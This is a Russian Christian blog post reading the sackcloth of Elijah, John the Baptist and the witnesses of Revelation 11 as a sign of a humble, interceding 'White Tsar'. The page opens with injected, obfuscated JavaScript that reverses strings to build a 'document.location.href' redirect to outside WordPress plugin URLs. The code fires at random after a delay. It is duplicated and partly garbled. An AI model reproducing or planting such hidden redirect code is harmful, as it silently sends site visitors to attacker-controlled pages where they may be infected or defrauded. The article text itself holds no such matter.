$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
Пророк Илья, Иоанн Креститель и два последние свидетеля из Откровения 11 — облечены во вретища — грубую одежду, власяницу. Что это значит? Значит ли это, что своего рода униформой Белого царя и Белого пророка будет белая одежда? Давайте разберемся.
И дам двум свидетелям Моим, и они будут пророчествовать тысячу двести шестьдесят дней, будучи облечены во вретище. Это суть две маслины и два светильника, стоящие пред Богом земли. Откровение 11:3-4
Эта одежда — узнаваема, знакома царям. Вот что сказал царь Охозия человеку, встретившему пророка:
«И сказал им: каков видом тот человек, который вышел навстречу вам и говорил вам слова сии? Они сказали ему: человек тот весь в волосах и кожаным поясом подпоясан по чреслам своим. И сказал он: это Илия Фесвитянин.»
4 Царств 1:7-8
Что это значит? Две вещи. Во-первых, эта не традиционная царская одежда, а одежда странника — которая указывает на годы скитаний Белого царя до своего вступления на трон. Как я уже говорил, жизнь пророка Ильи указывает на до-царский период в жизни Белого царя. А вознесение Илии и передача полномочий (вместе со своей одеждой) Елисею — это образ воцарения.
Но есть и второе, не менее важное значение у вретища. Дело в том, что вретище является одеждой ходатайственной молитвы. Даже самые жизнерадостные цари, такие как Давид и Соломон, временами облачались во вретища, в одежды скорби — чтобы молиться о своем народе. Великие богобоязненные цари были облечены во вретище (тому десятки примеров) в самые высокие моменты своей духовной жизни, в своем предстоянии перед Богом за свой народ. Вретище — это одежда ходатая. Царь, облаченный во вретище — это царь-молитвенник, царь-ходатай. Иисус Христос также объяснил значимость этой одежды:
«Иисус начал говорить народу об Иоанне: что́ смотреть ходили вы в пустыню? трость ли, ветром колеблемую? Что́ же смотреть ходили вы? человека ли, одетого в мягкие одежды? Носящие мягкие одежды находятся в чертогах царских. Что́ же смотреть ходили вы? пророка? Да, говорю вам, и больше пророка. Ибо он тот, о котором написано: «се, Я посылаю Ангела Моего пред лицом Твоим, который приготовит путь Твой пред Тобою». Истинно говорю вам: из рожденных женами не восставал больший Иоанна Крестителя; но меньший в Царстве Небесном больше его.» Матфея 11:7-11.Понимаете, друзья, мне многие пишут, что я, якобы, хочу вернуть темные царские времена. Ну, во-первых, я действительно считаю, что царские времена — гораздо светлее нецарских. Но я не собираюсь их возвращать (да это и невозможно) или возвращаться к той монархии — с ее гордым блеском — которая была.
И тут — третье значение простой одежды, в которой изображаются царь и пророк. Я вижу — вместе с библейскими пророками, вместе со старцами — Белого царя не осыпанного брильянтами, не купающегося в роскоши — но в скромности, и в постоянной ходатайственной молитве за народ. Иными словами, во-первых, не ищите Белого царя среди богатых или выражающих интересы богатых: Носящие мягкие одежды находятся в чертогах царских. И не ищите Белого царя, облаченного в крутую стильную власяницу, дырявую или от лучших модельеров. Его «власяница» — это скромная жизнь предстоятеля и ходатая. Много скорби у царя — как много было ее и у Илии, и у Давида. И, конечно же, у Иисуса Христа.
Одежда, в которой предстает перед нами Илья, прячущийся от Ахава и Иезавели, и в которой долгое время будет одет Давид, прячась от Саула — есть одежда царя иного, необычного рода — Белого царя. Как внешнее описание этих людей (одетых бедно, не по царски), так и их тяжелая жизнь являются проекцией на путь последнего Предтечи. И она вовсе не обязательно будет по виду белой. В своем романе-притче Толкин обличает Гэндальфа (этого прототипа Белого пророка) в серое вретище, и даже называет его — Гэндальф Серый. Но придет время и откроется, что серый он только по наружности, для внешних. А вообще-то он — Гэндальф Белый. Сказка — ложь, да в ней намек.
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
Мы в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
«Новости христианства» — Telegtam, ВКонтакте
No Comments